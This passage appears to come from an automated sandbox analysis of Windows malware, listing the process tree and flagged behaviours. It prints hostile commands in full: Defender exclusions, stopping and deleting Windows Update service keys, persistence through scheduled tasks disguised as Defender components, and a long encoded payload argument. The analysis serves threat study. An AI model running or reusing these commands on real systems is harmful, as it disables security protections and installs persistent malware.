- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 3126⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 2363⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe ovyftblehadxh2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe dazvaqbeggbsgujt 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2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3364 -s 3562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3276 -s 9362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1064 -ip 10642⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5004 -ip 50042⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 3364 -ip 33642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 532 -p 3276 -ip 32762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 3328 -ip 33282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 644 -p 3456 -ip 34562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 648 -p 1816 -ip 18162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 632 -p 4520 -ip 45202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 3956 -ip 39562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 652 -p 4168 -ip 41682⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 632 -p 4748 -ip 47482⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 660 -p 224 -ip 2242⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 1272 -ip 12722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 648 -p 3556 -ip 35562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 640 -p 1332 -ip 13322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 1312 -ip 13122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 2868 -ip 28682⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4184 -ip 41842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 640 -p 4368 -ip 43682⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 3408 -ip 34082⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 5036 -ip 50362⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3328 -s 4722⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3456 -s 4202⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1816 -s 5002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4520 -s 4922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3956 -s 5002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4168 -s 4682⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4748 -s 5042⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 224 -s 4242⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1272 -s 4522⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3556 -s 4522⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1332 -s 3682⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1312 -s 4282⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2868 -s 4242⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
